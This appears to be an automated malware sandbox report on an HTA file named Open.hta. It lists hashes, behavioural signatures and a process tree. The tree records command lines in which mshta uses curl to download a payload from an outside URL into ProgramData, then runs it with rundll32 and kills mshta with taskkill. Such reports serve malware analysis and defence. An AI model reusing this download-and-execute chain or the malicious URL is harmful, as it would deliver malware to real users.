Resubmissions
02-02-2023 21:19
ID | Score | Date
230202-z6jahaba9y | 10 | 02-02-2023 21:19
230202-z6b67aba9w | 7 | 02-02-2023 21:17
230202-z48sdafh78 | 7 | 02-02-2023 20:21
230202-y5afjaae3w | 10 | 02-02-2023 20:20
230202-y4k6msfd36 | 7 | 02-02-2023 20:03
230202-ysnsdsac8z | 7 | 02-02-2023 20:02
230202-yr9ngaac8w | 7 | 02-02-2023 20:01
230202-yrllmsfb54 | 7 | 02-02-2023 19:47
230202-yhszcsab9z | 7 | 02-02-2023 19:46
230202-yg5lrsfa45 | 7 |
Analysis
- max time kernel: 948s
- max time network: 950s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 02-02-2023 20:03
Static task
- static1
Behavioral task
- behavioral1
  Sample: Open.hta
  Resource: win7-20220812-en
Behavioral task
- behavioral2
  Sample: Open.hta
  Resource: win10v2004-20220812-en
General
- Target: Open.hta
- Size: 3KB
- MD5: 7daa66c5c04a63b630e284360740bc3f
- SHA1: 13ccbcef1329ae8c204c13e757a867e31f3b62bc
- SHA256: 35e319a9cd3e423081fa1d0a0c084f555b1c5fb1042189dd969d1706f6d25fe2
- SHA512: c23873af1524f9d97e4f4066a64240a6339c9ebe30ed1a623c60db683b0e85189dab28976f9116a7c9a38a864b9acdc8de66fda96ea7e3e58b46217efe965744
Malware Config
Signatures
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes: mshta.exe
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | mshta.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Kills process with taskkill (1 IoC)
  Processes: taskkill.exe
  pid | process
  1508 | taskkill.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: taskkill.exe
  description | pid | process
  Token: SeDebugPrivilege | 1508 | taskkill.exe
- Suspicious use of WriteProcessMemory (9 IoCs)
  Processes: mshta.exe
  description | pid | process | target process
  PID 4568 wrote to memory of 5048 | 4568 | mshta.exe | curl.exe
  PID 4568 wrote to memory of 5048 | 4568 | mshta.exe | curl.exe
  PID 4568 wrote to memory of 5048 | 4568 | mshta.exe | curl.exe
  PID 4568 wrote to memory of 4268 | 4568 | mshta.exe | rundll32.exe
  PID 4568 wrote to memory of 4268 | 4568 | mshta.exe | rundll32.exe
  PID 4568 wrote to memory of 4268 | 4568 | mshta.exe | rundll32.exe
  PID 4568 wrote to memory of 1508 | 4568 | mshta.exe | taskkill.exe
  PID 4568 wrote to memory of 1508 | 4568 | mshta.exe | taskkill.exe
  PID 4568 wrote to memory of 1508 | 4568 | mshta.exe | taskkill.exe
Processes
- C:\Windows\SysWOW64\mshta.exe
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Open.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\curl.exe
    Command line: "C:\Windows\System32\curl.exe" --output C:\ProgramData\1.png --url https://spincotech.com/8CoBExd/3.gif
  - C:\Windows\SysWOW64\rundll32.exe
    Command line: "C:\Windows\System32\rundll32.exe" C:\ProgramData\1.png,Wind
  - C:\Windows\SysWOW64\taskkill.exe
    Command line: "C:\Windows\System32\taskkill.exe" /f /im mshta.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken